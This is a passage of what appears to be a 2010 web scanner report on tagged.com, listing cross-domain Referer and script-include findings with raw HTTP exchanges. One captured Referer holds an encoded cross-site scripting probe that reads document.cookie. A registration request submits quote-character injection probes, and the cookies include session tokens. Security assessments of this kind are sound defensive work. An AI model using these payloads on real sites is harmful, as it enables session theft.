If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


7.1. http://www.tagged.com/help.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /help.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /help.html?topic=report-abuse HTTP/1.1
Host: www.tagged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: connect_status=-1; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmc=50703532; __utmb=50703532.0.10.1293588625; __qca=P0-159294429-1293588622548;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:18:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 18445

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="text/css" href="http://x.tagstat.com/dyn/css/5/-LB9WQalJ.css"></link>
<link rel="stylesheet" type="text/css" href="http://x.tagstat.com/dyn/css/3/HAplW1mw4.css"></link>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/yahoo/yahoo-min.js&2.8.0/build/event/event-min.js&2.8.0/build/dom/dom-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/p/Y7Ha01NCE.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/connection/connection-min.js&2.8.0/build/json/json-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/w/I2aeGGB9R.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0/build/container/container-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/9/RWYIg6Gl6.js"></script>
...[SNIP]...
<a href="http://www.tagged.com/home.html" id="tagged_logo"><img class="png with_gold" src="http://x.tagstat.com/im/headers/default/logo_small.png" width="146" height="27" /></a>
...[SNIP]...
<a href="#"><img src="http://x.tagstat.com/images/icons_new/icon_down_arrow_alerts.gif" /></a>
...[SNIP]...
<a href="#" class="yuimenuitemlabel">
<img src="http://x.tagstat.com/im/im/icon_presence_green_small.gif" />
<span>
...[SNIP]...
<a href="#" class="yuimenuitemlabel">
<img src="http://x.tagstat.com/im/im/icon_presence_grey_small.gif" />
<span>
...[SNIP]...
<div class="left_icon">
<img src="http://x.tagstat.com/im/chrome/envelope.png" />
</div>
...[SNIP]...
<p>
<a href="http://about-tagged.com">About</a> |
<a href="http://about-tagged.com/news">Blog</a>
...[SNIP]...
</div><script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/cookie/cookie-min.js&2.8.0/build/container/container_core-min.js&2.8.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/r/tBb3aD9XN.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://x.tagstat.com/dyn/js/6/IA0NrFQOy.js"></script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<noscript><img src="http://pixel.quantserve.com/pixel/p-96ZHBHvG56-qg.gif" style="display:none" height="1" width="1" alt="Quantcast"/></noscript>
<script type="text/javascript" src="http://www.google.com/recaptcha/api/js/recaptcha_ajax.js"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=7198000&c3=&c4=www.tagged.com/help.html&c5=&c6=&c15=6a5cc8097d3d01215532beeb0c0c574ec5cac05b&cj=1" />
</noscript>
...[SNIP]...

7.2. http://www.tagged.com/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.html?r=%2Fhome.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/api/?application_id=user&format=jsonaa996%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eba49b2dbe3e209c77&session_token=t4urklho6estviojs26it3hs07&method=tagged.reg.logUserActions&actions=%7B%22email%22%3A1%2C%22first_name%22%3A1%2C%22last_name%22%3A1%2C%22birth_month%22%3A1%2C%22birth_day%22%3A1%2C%22birth_year%22%3A1%2C%22zipCode%22%3A1%2C%22password%22%3A1%7D&api_signature=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; connect_status=-1; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:20:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 37138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="html_head">
<meta name="verify-v1" content="3D/41
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="http://x.tagstat.com/dyn/css/f/3J8PuWxj0.css"></link>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0/build/utilities/utilities.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/yahoo/yahoo-min.js&2.8.0/build/cookie/cookie-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/A/dFYxg19Vt.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event/event-min.js&2.8.0/build/connection/connection-min.js&2.8.0/build/json/json-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/n/7wE7hDN3o.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/dom/dom-min.js&2.8.0/build/datasource/datasource-min.js&2.8.0/build/autocomplete/autocomplete-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/G/mFcImw0jQ.js"></script>
...[SNIP]...
<a href="http://www.tagged.com/home.html" id="tagged_logo" class="header_content"><img class="png" src="http://x.tagstat.com/im/headers/default/logo.png" width="190" height="65"/></a>
...[SNIP]...
<div class="row1">
<img src="http://x.tagstat.com/im/regpath/index_sales_marquee.jpg"/>
</div>
...[SNIP]...
<!--show captcha-->
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js?123"></script>
...[SNIP]...
<p>
<a href="http://about-tagged.com">About</a> |
<a href="http://about-tagged.com/news">Blog</a>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<noscript><img src="http://pixel.quantserve.com/pixel/p-96ZHBHvG56-qg.gif" style="display:none" height="1" width="1" alt="Quantcast"/></noscript>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=7198000&c3=&c4=www.tagged.com/index.html&c5=&c6=&c15=6e2912c4ef57a38bb639e41d310c808ef2b9a14b&cj=1" />
</noscript>
...[SNIP]...

7.3. http://www.tagged.com/register.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /register.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

POST /register.html?page=index HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/
Cache-Control: max-age=0
Origin: http://www.tagged.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=dvhiv3dhhk4sr6bc1ttavum794; __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532
Content-Length: 409

firstName=%27&lastName=%27&gender=F&birthMonth=1&birthDay=1&birthYear=1970&country=US&city=&zipCode=10010&locale=en_US&email=test%40fastdial.net&password=SkipIt1&recaptcha_challenge_field=03AHJ_Vuvg3Y
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:18:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 29969

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Tagged - Register</title>
<link rel="stylesheet" type="text/
...[SNIP]...
</p><script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js?123"></script>
...[SNIP]...

7.4. http://www.tagged.com/search.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /search.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search.html?source=header HTTP/1.1
Host: www.tagged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: connect_status=-1; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmc=50703532; __utmb=50703532.0.10.1293588625; __qca=P0-159294429-1293588622548;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:18:54 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 11978

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Search</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="text/css" href="http://x.tagstat.com/dyn/css/5/-LB9WQalJ.css"></link>
<link rel="stylesheet" type="text/css" href="http://x.tagstat.com/dyn/css/6/BeytmOb6Y.css"></link>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/yahoo/yahoo-min.js&2.8.0/build/event/event-min.js&2.8.0/build/dom/dom-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/p/Y7Ha01NCE.js"></script>
...[SNIP]...
</div>

<link rel="stylesheet" type="text/css" href="http://x.tagstat.com/dyn/css/H/SeREu7XWG.css"></link>
...[SNIP]...
<div class="right_block">
<img alt="Tagged" src="http://x.tagstat.com/im/headers/default/tagged_logo_black_blue_bk.gif" />
<p class="align_center">
...[SNIP]...
<p>
<a href="http://about-tagged.com">About</a> |
<a href="http://about-tagged.com/news">Blog</a>
...[SNIP]...
</div><script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/cookie/cookie-min.js&2.8.0/build/container/container_core-min.js&2.8.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/m/NjR_x7owD.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/connection/connection-min.js&2.8.0/build/json/json-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/X/ocZCEb-GY.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0/build/container/container-min.js"></script>
<link rel="stylesheet" type="text/css" href="http://x.tagstat.com/dyn/css/S/JKkMB62Sf.css"></link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/g/l4XLT5pxV.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://x.tagstat.com/dyn/js/W/GoG9pMqt1.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/datasource/datasource-min.js&2.8.0/build/autocomplete/autocomplete-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/f/_sLAB-ITX.js"></script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<noscript><img src="http://pixel.quantserve.com/pixel/p-96ZHBHvG56-qg.gif" style="display:none" height="1" width="1" alt="Quantcast"/></noscript>
<script type="text/javascript" src="http://www.google.com/recaptcha/api/js/recaptcha_ajax.js"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=7198000&c3=&c4=www.tagged.com/search.html&c5=&c6=&c15=6a5cc8097d3d01215532beeb0c0c574ec5cac05b&cj=1" />
</noscript>
...[SNIP]...

7.5. http://www.tagged.com/terms_of_service.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /terms_of_service.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /terms_of_service.html?reg=1 HTTP/1.1
Host: www.tagged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: connect_status=-1; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmc=50703532; __utmb=50703532.0.10.1293588625; __qca=P0-159294429-1293588622548;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:18:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 58202

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Terms of Service</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="text/css" href="http://x.tagstat.com/dyn/css/5/-LB9WQalJ.css"></link>
<link rel="stylesheet" type="text/css" href="http://x.tagstat.com/dyn/css/j/tWRuoRz_4.css"></link>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/yahoo/yahoo-min.js&2.8.0/build/event/event-min.js&2.8.0/build/dom/dom-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/p/Y7Ha01NCE.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/connection/connection-min.js&2.8.0/build/json/json-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/w/I2aeGGB9R.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0/build/container/container-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/9/RWYIg6Gl6.js"></script>
...[SNIP]...
<a href="http://www.tagged.com/home.html" id="tagged_logo"><img class="png with_gold" src="http://x.tagstat.com/im/headers/default/logo_small.png" width="146" height="27" /></a>
...[SNIP]...
<a href="#"><img src="http://x.tagstat.com/images/icons_new/icon_down_arrow_alerts.gif" /></a>
...[SNIP]...
<a href="#" class="yuimenuitemlabel">
<img src="http://x.tagstat.com/im/im/icon_presence_green_small.gif" />
<span>
...[SNIP]...
<a href="#" class="yuimenuitemlabel">
<img src="http://x.tagstat.com/im/im/icon_presence_grey_small.gif" />
<span>
...[SNIP]...
<div class="left_icon">
<img src="http://x.tagstat.com/im/chrome/envelope.png" />
</div>
...[SNIP]...
<p>For more information about COPPA, please visit the <a
href="http://www.ftc.gov/">
Federal Trade Commission's web site</a>
...[SNIP]...
nor control over, advertisers' cookies or how they may be
used. If you would like more information about advertisers' use of cookies,
and about your option not to accept these cookies, please click
<a href="http://www.networkadvertising.org/managing/opt_out.asp">here</a>
...[SNIP]...
<p>
<a href="http://about-tagged.com">About</a> |
<a href="http://about-tagged.com/news">Blog</a>
...[SNIP]...
</div><script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/cookie/cookie-min.js&2.8.0/build/container/container_core-min.js&2.8.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/r/tBb3aD9XN.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://x.tagstat.com/dyn/js/5/BgrBVAnP8.js"></script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<noscript><img src="http://pixel.quantserve.com/pixel/p-96ZHBHvG56-qg.gif" style="display:none" height="1" width="1" alt="Quantcast"/></noscript>
<script type="text/javascript" src="http://www.google.com/recaptcha/api/js/recaptcha_ajax.js"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=7198000&c3=&c4=www.tagged.com/terms_of_service.html&c5=&c6=&c15=6a5cc8097d3d01215532beeb0c0c574ec5cac05b&cj=1" />
</noscript>
...[SNIP]...

8. Cross-domain script include  previous  next
There are 16 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


8.1. http://www.tagged.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=dvhiv3dhhk4sr6bc1ttavum794

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:10:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 37540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="html_head">
<meta name="verify-v1" content="3D/41
...[SNIP]...
</link>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0/build/utilities/utilities.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/yahoo/yahoo-min.js&2.8.0/build/cookie/cookie-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/A/dFYxg19Vt.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event/event-min.js&2.8.0/build/connection/connection-min.js&2.8.0/build/json/json-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/n/7wE7hDN3o.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/dom/dom-min.js&2.8.0/build/datasource/datasource-min.js&2.8.0/build/autocomplete/autocomplete-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/G/mFcImw0jQ.js"></script>
...[SNIP]...
</p><script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js?123"></script>
...[SNIP]...
<!--show captcha-->
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js?123"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

8.2. http://www.tagged.com/account_info.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /account_info.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /account_info.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/home.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532; connect_status=-1

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:16:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 78142

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Account Info</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="text
...[SNIP]...
</link>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/yahoo/yahoo-min.js&2.8.0/build/event/event-min.js&2.8.0/build/dom/dom-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/p/Y7Ha01NCE.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/connection/connection-min.js&2.8.0/build/json/json-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/w/I2aeGGB9R.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0/build/container/container-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/9/RWYIg6Gl6.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/cookie/cookie-min.js&2.8.0/build/container/container_core-min.js&2.8.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/r/tBb3aD9XN.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://x.tagstat.com/dyn/js/c/wEnaR_nff.js"></script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://www.google.com/recaptcha/api/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.3. http://www.tagged.com/browse.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /browse.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse.html HTTP/1.1
Host: www.tagged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: connect_status=-1; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmc=50703532; __utmb=50703532.0.10.1293588625; __qca=P0-159294429-1293588622548;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:18:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 29677

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Browse</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="text/css"
...[SNIP]...
</link>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/yahoo/yahoo-min.js&2.8.0/build/event/event-min.js&2.8.0/build/dom/dom-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/p/Y7Ha01NCE.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/connection/connection-min.js&2.8.0/build/json/json-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/w/I2aeGGB9R.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0/build/container/container-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/9/RWYIg6Gl6.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/cookie/cookie-min.js&2.8.0/build/container/container_core-min.js&2.8.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/r/tBb3aD9XN.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://x.tagstat.com/dyn/js/T/jd8_wpkhn.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/datasource/datasource-min.js&2.8.0/build/autocomplete/autocomplete-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/B/TSXD4RikU.js"></script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://www.google.com/recaptcha/api/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.4. http://www.tagged.com/exelator.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /exelator.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /exelator.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/home.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532; S=t4urklho6estviojs26it3hs07

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:15:04 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 131

<html><body>
<script type="text/javascript" src="http://loadus.exelator.com/load/?p=124&g=001&ag=40&gd=2"></script>
</body></html>

8.5. http://www.tagged.com/find_groups.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /find_groups.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /find_groups.html HTTP/1.1
Host: www.tagged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
